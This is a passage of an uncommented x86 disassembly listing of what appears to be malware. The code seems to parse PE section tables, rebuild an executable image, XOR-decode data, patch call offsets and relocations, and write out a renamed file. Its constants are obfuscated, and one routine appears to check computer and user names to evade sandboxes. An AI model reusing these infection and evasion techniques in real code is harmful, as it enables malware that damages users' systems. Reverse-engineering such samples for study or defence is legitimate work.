mov [ebp+var_43C], eax
jmp short loc_4202D7
; ---------------------------------------------------------------------------
loc_4202A2: ; CODE XREF: sub_41F8D9+A0A�j
call dword ptr ds:10013D90h
mov edi, [ebp+var_43C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F40], edx
mov [ebp+var_31F3C], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F40]
mov [ecx+edi], dl
inc [ebp+var_43C]
loc_4202D7: ; CODE XREF: sub_41F8D9+9C7�j
mov eax, [ebp+var_84C]
cmp [ebp+var_43C], eax
jb short loc_4202A2
cmp [ebp+var_1180], 0
jz short loc_420360
mov eax, [ebp+var_8]
mov edx, [eax+34h]
add edx, [eax+28h]
mov eax, ds:100140C0h
add eax, ds:10014168h
sub eax, 6
add edx, eax
mov [ebp+var_31F44], edx
mov eax, [ebp+var_850]
movsx edx, word ptr ds:100141DCh
add edx, ds:1001415Ch
dec edx
add eax, edx
mov edx, [ebp+var_4]
mov eax, [edx+eax]
mov [ebp+var_31F48], eax
mov edx, ds:1001422Ch
add edx, 0FFFFFFFBh
sub eax, edx
add eax, [ebp+var_31F44]
mov edx, ds:10014094h
add edx, 2
add eax, edx
mov [ebp+var_31F4C], eax
mov eax, [ebp+var_8]
mov edx, [ebp+var_31F4C]
sub edx, [eax+34h]
mov [eax+28h], edx
loc_420360: ; CODE XREF: sub_41F8D9+A13�j
push 0Dh
push 1001428Ch
lea eax, [ebp+var_31ED4]
push eax
call dword ptr ds:10012808h
mov eax, [esi+10h]
add eax, 0Dh
push eax
lea eax, [ebp+var_31ED4]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call dword ptr ds:10012808h
add esp, 18h
mov eax, [esi+14h]
add eax, 0Dh
mov [ebp+var_1068], eax
movsx edx, word ptr ds:10014228h
sub edx, 2
add eax, edx
mov [ebp+var_424], eax
jmp short loc_4203CC
; ---------------------------------------------------------------------------
loc_4203B2: ; CODE XREF: sub_41F8D9+B02�j
mov eax, [ebp+var_424]
add eax, [ebp+var_4]
movzx edx, byte ptr [eax]
xor edx, [ebp+var_1064]
mov [eax], dl
inc [ebp+var_424]
loc_4203CC: ; CODE XREF: sub_41F8D9+AD7�j
mov eax, [ebp+var_1068]
add eax, [ebp+arg_8]
cmp [ebp+var_424], eax
jb short loc_4203B2
mov eax, ds:10014124h
movsx edx, word ptr ds:10014204h
add eax, edx
sub eax, 8
mov [ebp+var_18], eax
mov eax, ds:10014168h
add eax, ds:10014240h
sub eax, 9
mov [ebp+var_440], eax
jmp loc_420673
; ---------------------------------------------------------------------------
loc_42040A: ; CODE XREF: sub_41F8D9+DAA�j
mov eax, 28h
mul [ebp+var_440]
mov [ebp+var_31F48], eax
mov eax, [ebp+var_84C]
mov edx, [ebp+var_42C]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F48]
mov ebx, edx
add ebx, eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F4C], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F4C]
mov esi, edx
add esi, eax
movsx eax, word ptr ds:100140C4h
add eax, ds:100140B0h
sub eax, 12h
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_4204B2
movsx eax, word ptr ds:1001421Ch
add eax, ds:10014240h
sub eax, 5
cmp byte ptr [ebx+eax], 72h
jnz short loc_4204B2
mov eax, ds:100140ACh
add eax, ds:100140D0h
dec eax
cmp byte ptr [ebx+eax], 63h
jnz short loc_4204B2
mov eax, [ebx+14h]
mov [ebp+var_1178], eax
jmp loc_42066D
; ---------------------------------------------------------------------------
loc_4204B2: ; CODE XREF: sub_41F8D9+BA1�j
; sub_41F8D9+BB7�j ...
mov eax, ds:100141B4h
add eax, ds:10014150h
sub eax, 6
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_4204FC
mov eax, ds:10014218h
sub eax, 8
cmp byte ptr [ebx+eax], 65h
jnz short loc_4204FC
mov eax, ds:100141ACh
add eax, ds:100141A0h
cmp byte ptr [ebx+eax], 61h
jnz short loc_4204FC
mov eax, [ebx+14h]
mov [ebp+var_117C], eax
mov eax, [ebx+0Ch]
mov [ebp+var_1184], eax
jmp loc_42066D
; ---------------------------------------------------------------------------
loc_4204FC: ; CODE XREF: sub_41F8D9+BEB�j
; sub_41F8D9+BF9�j ...
mov eax, ds:100141E0h
add eax, ds:10014238h
sub eax, 0Ah
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_420541
mov eax, ds:10014218h
add eax, ds:10014200h
sub eax, 0Eh
cmp byte ptr [ebx+eax], 69h
jnz short loc_420541
movsx eax, word ptr ds:10014098h
movsx edx, word ptr ds:10014228h
add eax, edx
sub eax, 4
cmp byte ptr [ebx+eax], 61h
jz loc_42066D
loc_420541: ; CODE XREF: sub_41F8D9+C35�j
; sub_41F8D9+C49�j
push ebx
push esi
call dword ptr ds:100101A4h
mov eax, [ebx+8]
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebx+10h]
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, [ebx+24h]
mov [esi+24h], eax
mov eax, ds:100141A4h
add eax, 2
movsx edx, word ptr ds:10014194h
add eax, edx
push eax
movsx eax, word ptr ds:100140F4h
sub eax, 7
push eax
mov eax, esi
add eax, 18h
push eax
call dword ptr ds:10012818h
mov edi, [ebp+var_18]
mov edx, [ebx+0Ch]
mov [ebp+edi*4+var_420], edx
mov edx, [ebx+8]
mov [ebp+edi*4+var_83C], edx
mov edx, [esi+0Ch]
mov [ebp+edi*4+var_C4C], edx
mov edx, [esi+14h]
mov [ebp+edi*4+var_1050], edx
inc [ebp+var_18]
mov eax, [ebx+10h]
add [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_31F44], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_421499
add esp, 1Ch
mov [ebp+var_10], eax
mov eax, ds:100140ACh
movsx edx, word ptr ds:10014128h
add eax, edx
sub eax, 9
cmp byte ptr [ebx+eax], 64h
jnz short loc_420618
mov eax, [ebp+var_31F44]
cmp [ebp+var_10], eax
jbe short loc_420618
mov ecx, [ebp+var_10]
sub ecx, eax
mov [ebp+var_31F50], ecx
mov eax, ecx
add [esi+8], eax
mov eax, ecx
add [esi+10h], eax
loc_420618: ; CODE XREF: sub_41F8D9+D1D�j
; sub_41F8D9+D28�j
mov eax, ds:100141A8h
add eax, 0FF1h
movsx edx, word ptr ds:10014220h
add eax, edx
push eax
mov eax, [ebp+var_20]
add eax, [ebx+8]
push eax
call sub_421499
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [ebx+8]
mov [eax+50h], edx
push dword ptr [esi+10h]
mov eax, [ebx+14h]
add eax, [ebp+var_42C]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call dword ptr ds:10012808h
add esp, 14h
loc_42066D: ; CODE XREF: sub_41F8D9+BD4�j
; sub_41F8D9+C1E�j ...
inc [ebp+var_440]
loc_420673: ; CODE XREF: sub_41F8D9+B2C�j
mov eax, [ebp+var_848]
movzx eax, word ptr [eax+6]
cmp [ebp+var_440], eax
jb loc_42040A
mov eax, [ebp+var_1178]
add eax, [ebp+var_42C]
mov [ebp+var_14], eax
loc_420698: ; CODE XREF: sub_41F8D9+FF5�j
movsx eax, word ptr ds:10014180h
sub eax, 5
mov [ebp+var_1C], eax
jmp short loc_420703
; ---------------------------------------------------------------------------
loc_4206A7: ; CODE XREF: sub_41F8D9+E30�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_14]
mov edx, [edx]
cmp [ebp+edi*4+var_420], edx
jnz short loc_4206C3
mov eax, [ebp+var_14]
mov eax, [eax]
mov [ebp+var_C50], eax
loc_4206C3: ; CODE XREF: sub_41F8D9+DDD�j
mov edi, [ebp+var_1C]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
mov edi, [ebp+var_14]
cmp edx, [edi]
jbe short loc_420700
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_1050]
mov [ebp+var_106C], edi
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1054], edi
jmp short loc_42070B
; ---------------------------------------------------------------------------
loc_420700: ; CODE XREF: sub_41F8D9+E03�j
inc [ebp+var_1C]
loc_420703: ; CODE XREF: sub_41F8D9+DCC�j
mov eax, [ebp+var_18]
cmp [ebp+var_1C], eax
jb short loc_4206A7
loc_42070B: ; CODE XREF: sub_41F8D9+E25�j
mov eax, ds:1001418Ch
add eax, ds:100140B0h
sub eax, 0Ah
mov [ebp+var_428], eax
jmp loc_420894
; ---------------------------------------------------------------------------
loc_420724: ; CODE XREF: sub_41F8D9+FC7�j
mov eax, [ebp+var_428]
movsx edx, word ptr ds:100141DCh
dec edx
add eax, edx
add eax, [ebp+var_14]
mov [ebp+var_31F48], eax
mov ax, [eax]
mov word ptr [ebp+var_31F44], ax
movzx eax, word ptr [ebp+var_31F44]
mov edx, ds:10014184h
dec edx
cmp eax, edx
jz loc_4208A6
movzx edi, word ptr [ebp+var_31F44]
mov edx, ds:10014238h
add edx, ds:10014218h
mov ecx, edx
sub ecx, 6
sar edi, cl
mov word ptr [ebp+var_31F4C+2], di
movzx edi, word ptr [ebp+var_31F44]
movsx edx, word ptr ds:10014090h
add edx, ds:10014100h
mov ecx, edx
sub ecx, 8
shl edi, cl
mov word ptr [ebp+var_31F44+2], di
movzx edi, word ptr [ebp+var_31F44+2]
mov edx, ds:100141C8h
mov ecx, edx
add ecx, ds:10014150h
sar edi, cl
mov word ptr [ebp+var_31F44+2], di
movzx eax, word ptr [ebp+var_31F44+2]
mov edx, ds:100140C8h
movsx ecx, word ptr ds:100140E4h
add edx, ecx
sub edx, 4
cmp eax, edx
jnz short loc_4207F5
mov eax, ds:100141A0h
add eax, ds:100141FCh
sub eax, 4
cmp [ebp+var_428], eax
jnz loc_4208A6
loc_4207F5: ; CODE XREF: sub_41F8D9+F00�j
mov eax, [ebp+var_848]
mov eax, [eax+34h]
mov edx, [ebp+var_14]
add eax, [edx]
movzx edx, word ptr [ebp+var_31F44+2]
add eax, edx
mov [ebp+var_31F50], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1054]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F44+2]
add eax, edx
mov [ebp+var_31F54], eax
sub eax, [ebp+var_31F50]
mov [ebp+var_31F58], eax
movzx eax, word ptr [ebp+var_31F4C+2]
mov edx, ds:100141A0h
add edx, 2
add edx, ds:100141C4h
cmp eax, edx
jnz short loc_420889
mov eax, [ebp+var_106C]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F44+2]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F5C], eax
mov edx, [ebp+var_31F58]
add [eax], edx
loc_420889: ; CODE XREF: sub_41F8D9+F83�j
mov eax, ds:100140E0h
add [ebp+var_428], eax
loc_420894: ; CODE XREF: sub_41F8D9+E46�j
mov eax, [ebp+var_14]
mov eax, [eax+4]
cmp [ebp+var_428], eax
jb loc_420724
loc_4208A6: ; CODE XREF: sub_41F8D9+E7E�j
; sub_41F8D9+F16�j
mov eax, [ebp+var_14]
mov edx, [eax+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_848]
mov eax, [eax+0A4h]
mov edx, [ebp+var_1178]
add edx, [ebp+var_42C]
add eax, edx
cmp [ebp+var_14], eax
jb loc_420698
mov eax, [ebp+var_8]
mov ecx, [eax+28h]
mov [ebp+var_1188], ecx
mov edx, [ebp+var_1060]
mov [eax+28h], edx
cmp [ebp+var_1180], 0
jnz short loc_420911
add eax, 60h
mov edx, [ebp+var_848]
mov edx, [edx+60h]
add [eax], edx
mov eax, [ebp+var_8]
add eax, 68h
mov edx, [ebp+var_848]
mov edx, [edx+68h]
add [eax], edx
loc_420911: ; CODE XREF: sub_41F8D9+1017�j
mov eax, [ebp+var_8]
movsx edx, word ptr ds:10014098h
add edx, 8
mov [eax+44h], dx
movsx edx, word ptr ds:10014194h
add edx, ds:100141B0h
sub edx, 8
mov [eax+1Ah], dl
mov edx, ds:100141A4h
movsx ecx, word ptr ds:10014220h
add edx, ecx
sub edx, 3
mov [eax+46h], dx
mov eax, [ebp+var_117C]
add eax, [ebp+var_42C]
mov [ebp+var_31EE4], eax
mov eax, [ebp+var_117C]
mov edx, [ebp+var_31EE4]
add eax, [edx+1Ch]
sub eax, [ebp+var_1184]
mov [ebp+var_31EE8], eax
add eax, [ebp+var_42C]
mov [ebp+var_31EEC], eax
mov eax, [eax]
mov [ebp+var_1058], eax
movsx eax, word ptr ds:100140F4h
movsx edx, word ptr ds:100140B8h
add eax, edx
sub eax, 10h
mov [ebp+var_24], eax
jmp short loc_4209E5
; ---------------------------------------------------------------------------
loc_4209A4: ; CODE XREF: sub_41F8D9+1112�j
mov edi, [ebp+var_24]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
cmp edx, [ebp+var_1058]
jbe short loc_4209E2
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_420]
mov [ebp+var_118C], edi
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1194], edi
jmp short loc_4209ED
; ---------------------------------------------------------------------------
loc_4209E2: ; CODE XREF: sub_41F8D9+10E5�j
inc [ebp+var_24]
loc_4209E5: ; CODE XREF: sub_41F8D9+10C9�j
mov eax, [ebp+var_18]
cmp [ebp+var_24], eax
jb short loc_4209A4
loc_4209ED: ; CODE XREF: sub_41F8D9+1107�j
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1194]
add eax, [ebp+var_1058]
sub eax, [ebp+var_118C]
mov [ebp+var_1190], eax
mov eax, [ebp+var_848]
mov eax, [eax+34h]
add eax, [ebp+var_1058]
mov [ebp+var_1058], eax
mov eax, [ebp+var_850]
mov [ebp+var_C], eax
jmp loc_420CA0
; ---------------------------------------------------------------------------
loc_420A2E: ; CODE XREF: sub_41F8D9+13D3�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
movzx ecx, byte ptr [edx+eax]
movsx edi, word ptr ds:10014110h
add edi, 0E9h
cmp ecx, edi
jnz loc_420B5A
movsx ecx, word ptr ds:100141F0h
add ecx, ds:100140A8h
sub ecx, 5
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, ds:100141E0h
dec edi
cmp ecx, edi
jnz loc_420B5A
movsx ecx, word ptr ds:10014114h
add ecx, ds:10014134h
sub ecx, 0Bh
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, ds:100141E8h
add edi, ds:100140CCh
sub edi, 0Dh
cmp ecx, edi
jnz loc_420B5A
mov ecx, ds:10014240h
add ecx, 3
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, ds:100140BCh
sub edi, 2
cmp ecx, edi
jnz loc_420B5A
movsx ecx, word ptr ds:10014130h
add ecx, 2
add eax, ecx
movzx eax, byte ptr [edx+eax]
movsx edx, word ptr ds:100141DCh
sub edx, 9
cmp eax, edx
jnz short loc_420B5A
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1188]
mov [ebp+var_31F48], eax
mov eax, ds:10014200h
add eax, 0FFFFFFF9h
sub eax, [ebp+var_31F44]
add eax, [ebp+var_31F48]
mov edx, ds:1001416Ch
add edx, 2
sub eax, edx
mov [ebp+var_31F4C], eax
mov edi, ds:10014178h
add edi, ds:10014198h
mov edx, [ebp+var_C]
mov ecx, ds:100141FCh
sub ecx, 3
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-38h], ecx
loc_420B5A: ; CODE XREF: sub_41F8D9+116E�j
; sub_41F8D9+1195�j ...
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F44], edx
mov ecx, ds:10014170h
movzx edi, byte ptr [edx+eax]
mov edx, ds:100140C8h
lea edx, [ecx+edx+0E1h]
cmp edi, edx
jnz loc_420C9D
mov edx, ds:1001409Ch
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
movsx ecx, word ptr ds:10014130h
sub ecx, 2
cmp edx, ecx
jnz loc_420C9D
mov edx, ds:100140A4h
add edx, ds:100140DCh
sub edx, 7
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
mov ecx, ds:100141C4h
dec ecx
cmp edx, ecx
jnz loc_420C9D
mov edx, ds:10014124h
movsx ecx, word ptr ds:10014164h
add edx, ecx
sub edx, 3
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
mov ecx, ds:10014170h
sub ecx, 5
cmp edx, ecx
jnz loc_420C9D
movsx edx, word ptr ds:100140C4h
sub edx, 5
add eax, edx
mov edx, [ebp+var_31F44]
movzx eax, byte ptr [edx+eax]
mov edx, ds:1001409Ch
dec edx
cmp eax, edx
jnz short loc_420C9D
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_1190]
mov [ebp+var_31F4C], eax
mov eax, ds:100140F0h
add eax, 0FFFFFFFFh
sub eax, [ebp+var_31F48]
add eax, [ebp+var_31F4C]
movsx edx, word ptr ds:100140B8h
sub edx, 5
sub eax, edx
mov [ebp+var_31F50], eax
movsx edi, word ptr ds:10014164h
mov edx, [ebp+var_C]
movsx ecx, word ptr ds:1001412Ch
add ecx, ds:1001415Ch
sub ecx, 7
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-10h], ecx
loc_420C9D: ; CODE XREF: sub_41F8D9+12A6�j
; sub_41F8D9+12CC�j ...
inc [ebp+var_C]
loc_420CA0: ; CODE XREF: sub_41F8D9+1150�j
mov eax, [ebp+var_850]
add eax, 0Dh
cmp [ebp+var_C], eax
jb loc_420A2E
push [ebp+var_1070]
call dword ptr ds:1001282Ch
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:100101A4h
add esp, 8
lea ecx, [ebp+var_116F]
or eax, 0FFFFFFFFh
loc_420CDA: ; CODE XREF: sub_41F8D9+1406�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_420CDA
mov [ebp+var_31ED8], eax
mov edx, ds:100140C0h
movsx ecx, word ptr ds:10014194h
add edx, ecx
sub edx, 0Ah
sub eax, edx
mov [ebp+eax+var_116F], 69h
mov eax, [ebp+var_31ED8]
movsx edx, word ptr ds:10014194h
add edx, ds:100141A4h
sub edx, 8
sub eax, edx
mov [ebp+eax+var_116F], 76h
mov eax, [ebp+var_31ED8]
mov edx, ds:10014094h
add edx, ds:10014170h
sub edx, 6
sub eax, edx
mov [ebp+eax+var_116F], 72h
push 0
mov eax, ds:100140C0h
sub eax, 4
push eax
push 2
push 0
movsx eax, word ptr ds:10014090h
add eax, ds:100141CCh
sub eax, 6
push eax
push 40000000h
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:10013968h
mov [ebp+var_1070], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call dword ptr ds:10013D6Ch
push [ebp+var_1070]
call dword ptr ds:1001282Ch
push [ebp+var_4]
call dword ptr ds:100105CCh
push 0
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:10011534h
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:1000D008h
mov eax, 1
jmp short loc_420DE7
; ---------------------------------------------------------------------------
loc_420DD0: ; CODE XREF: sub_41F8D9+103�j
; sub_41F8D9+11D�j ...
push [ebp+var_1070]
call dword ptr ds:1001282Ch
push [ebp+var_4]
call dword ptr ds:100105CCh
xor eax, eax
loc_420DE7: ; CODE XREF: sub_41F8D9+9F�j
; sub_41F8D9+14F5�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F8D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420DEC proc near ; CODE XREF: .data:0041A7E0�p
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_1FE = byte ptr -1FEh
var_105 = byte ptr -105h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
call sub_41B366
or eax, eax
jz loc_421014
mov [ebp+var_204], 0FFh
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_FF]
push eax
call dword ptr ds:100105A0h
mov eax, ds:10014118h
movsx eax, [ebp+eax+var_105]
mov edx, ds:100140E0h
sub edx, 2
cmp eax, edx
jnz short loc_420E45
xor eax, eax
inc eax
jmp loc_421014
; ---------------------------------------------------------------------------
loc_420E45: ; CODE XREF: sub_420DEC+4F�j
push 1001529Fh
call sub_41B08F
mov edx, ds:10014158h
add edx, ds:10014118h
sub edx, 0Dh
push edx
push eax
lea edx, [ebp+var_FF]
push edx
call sub_4251A5
add esp, 10h
movsx ecx, word ptr ds:10014204h
add ecx, 0FFF9h
cmp eax, ecx
jz short loc_420E88
xor eax, eax
inc eax
jmp loc_421014
; ---------------------------------------------------------------------------
loc_420E88: ; CODE XREF: sub_420DEC+92�j
push 10015293h
call sub_41B08F
mov edx, ds:10014168h
sub edx, 8
push edx
push eax
lea edx, [ebp+var_FF]
push edx
call sub_4251A5
add esp, 10h
mov edx, eax
movsx ecx, word ptr ds:100140F4h
movsx eax, word ptr ds:10014164h
lea ecx, [ecx+eax+0FFF4h]
cmp edx, ecx
jz short loc_420ECF
xor eax, eax
inc eax
jmp loc_421014
; ---------------------------------------------------------------------------
loc_420ECF: ; CODE XREF: sub_420DEC+D9�j
mov [ebp+var_208], 0FFh
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_1FE]
push eax
call dword ptr ds:1000D038h
push 1001528Eh
call sub_41B08F
push eax
lea edx, [ebp+var_1FE]
push edx
call dword ptr ds:1000D024h
mov eax, ds:1001414Ch
sub eax, 7
push eax
lea eax, [ebp+var_FF]
push eax
lea eax, [ebp+var_1FE]
push eax
call sub_4251A5
add esp, 18h
mov edx, ds:100141D4h
add edx, 0FFFAh
cmp eax, edx
jz short loc_420F3C
xor eax, eax
inc eax
jmp loc_421014
; ---------------------------------------------------------------------------
loc_420F3C: ; CODE XREF: sub_420DEC+146�j
call dword ptr ds:10013800h
mov esi, eax
mov edi, esi
xor ebx, ebx
loc_420F48: ; CODE XREF: sub_420DEC+211�j
mov eax, ds:100141F8h
sub eax, 6
movzx eax, byte ptr [edi+eax]
mov edx, ds:10014100h
sub edx, 7
cmp eax, edx
jz loc_421002
mov ecx, edi
or eax, 0FFFFFFFFh
loc_420F6A: ; CODE XREF: sub_420DEC+183�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_420F6A
mov [ebp+var_20C], eax
push 10015284h
call sub_41B08F
add esp, 4
movsx edx, word ptr ds:100140B4h
sub edx, 3
push edx
push eax
push edi
call sub_4251A5
add esp, 0Ch
mov ecx, ds:100141F4h
add ecx, 0FFFCh
cmp eax, ecx
jz short loc_420FB0
mov ebx, 1
jmp short loc_421002
; ---------------------------------------------------------------------------
loc_420FB0: ; CODE XREF: sub_420DEC+1BB�j
push 10015273h
call sub_41B08F
mov edx, ds:10014170h
add edx, ds:100141ACh
sub edx, 9
push edx
push eax
push edi
call sub_4251A5
add esp, 10h
mov ecx, ds:100141D4h
add ecx, 0FFFAh
cmp eax, ecx
jz short loc_420FE9
xor ebx, ebx
inc ebx
jmp short loc_421002
; ---------------------------------------------------------------------------
loc_420FE9: ; CODE XREF: sub_420DEC+1F6�j
mov eax, ds:10014234h
sub eax, 2
mov edx, [ebp+var_20C]
add edx, edi
mov edi, eax
add edi, edx
jmp loc_420F48
; ---------------------------------------------------------------------------
loc_421002: ; CODE XREF: sub_420DEC+173�j
; sub_420DEC+1C2�j ...
push esi
call dword ptr ds:10012828h
or ebx, ebx
jz short loc_421012
xor eax, eax
inc eax
jmp short loc_421014
; ---------------------------------------------------------------------------
loc_421012: ; CODE XREF: sub_420DEC+21F�j
xor eax, eax
loc_421014: ; CODE XREF: sub_420DEC+13�j
; sub_420DEC+54�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_420DEC endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 10015CC4h
push esi
call dword ptr ds:10013824h
or eax, eax
jz short loc_421045
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_42108D
; ---------------------------------------------------------------------------
loc_421045: ; CODE XREF: .data:00421033�j
push 10015C34h
push esi
call dword ptr ds:10013824h
or eax, eax
jz short loc_421065
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_42108D
; ---------------------------------------------------------------------------
loc_421065: ; CODE XREF: .data:00421053�j
push 10015BF4h
push esi
call dword ptr ds:10013824h
or eax, eax
jz short loc_421085
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_42108D
; ---------------------------------------------------------------------------
loc_421085: ; CODE XREF: .data:00421073�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_42108D: ; CODE XREF: .data:00421043�j
; .data:00421063�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, ds:100140ACh
add eax, ds:1001422Ch
sub eax, 9
cmp ds:100105B8h, eax
jbe short loc_4210B8
push 100105B8h
call dword ptr ds:1000D010h
loc_4210B8: ; CODE XREF: .data:004210AB�j
mov eax, ds:100105B8h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4210C1 proc near ; CODE XREF: sub_41E931+238�p
; sub_41EF87+304�p ...
var_120A = byte ptr -120Ah
var_110B = byte ptr -110Bh
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 120Ch
call sub_425D5D
push ebx
push esi
push edi
push 10014E44h
call sub_41B08F
push eax
lea edi, [ebp+var_FFF]
push edi
call dword ptr ds:10013810h
add esp, 0Ch
mov esi, ds:100141A0h
jmp short loc_421114
; ---------------------------------------------------------------------------
loc_4210F4: ; CODE XREF: sub_4210C1+59�j
cmp [ebp+esi+var_FFF], 23h
jnz short loc_421113
mov eax, ds:10014150h
add eax, ds:100141B0h
sub eax, 9
mov [ebp+esi+var_FFF], al
loc_421113: ; CODE XREF: sub_4210C1+3B�j
inc esi
loc_421114: ; CODE XREF: sub_4210C1+31�j
cmp esi, 0FFFh
jb short loc_4210F4
movsx eax, word ptr ds:10014128h
add eax, ds:100141D8h
sub eax, 8
mov [ebp+var_1004], eax
mov ebx, ds:100141E0h
dec ebx
cmp [ebp+arg_0], 0
jnz short loc_42119E
loc_42113F: ; CODE XREF: sub_4210C1+DB�j
mov eax, [ebp+arg_4]
cmp [ebp+var_1004], eax
jnz short loc_421161
lea eax, [ebp+ebx+var_FFF]
push eax
push 10013850h
call sub_425D7D
jmp loc_4213E7
; ---------------------------------------------------------------------------
loc_421161: ; CODE XREF: sub_4210C1+87�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_42116B: ; CODE XREF: sub_4210C1+AF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_42116B
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, ds:100141BCh
add edx, ds:100140CCh
sub edx, 9
cmp eax, edx
jz loc_4213E7
jmp short loc_42113F
; ---------------------------------------------------------------------------
loc_42119E: ; CODE XREF: sub_4210C1+7C�j
mov eax, ds:1001431Ch
mov [ebp+var_1008], eax
movsx eax, word ptr ds:10014148h
mov edx, [ebp+arg_0]
mov ecx, ds:100140D8h
add ecx, ds:100140F0h
sub ecx, 5
mov [edx+eax], cl
movsx ebx, word ptr ds:10014204h
sub ebx, 6
mov eax, ds:100140C0h
add eax, ds:1001413Ch
sub eax, 0Ch
mov [ebp+var_1004], eax
loc_4211E3: ; CODE XREF: sub_4210C1+2FE�j
push 10014E39h
call sub_41B08F
push eax
lea edi, [ebp+var_110B]
push edi
call sub_425D7D
lea eax, [ebp+ebx+var_FFF]
push eax
lea eax, [ebp+var_110B]
push eax
call dword ptr ds:1000D024h
add esp, 0Ch
call dword ptr ds:10013D90h
mov ecx, 14h
cdq
idiv ecx
mov [ebp+var_100C], edx
mov eax, ds:100141BCh
add eax, ds:1001409Ch
sub eax, 2
cmp edx, eax
jnb loc_421311
push [ebp+var_1008]
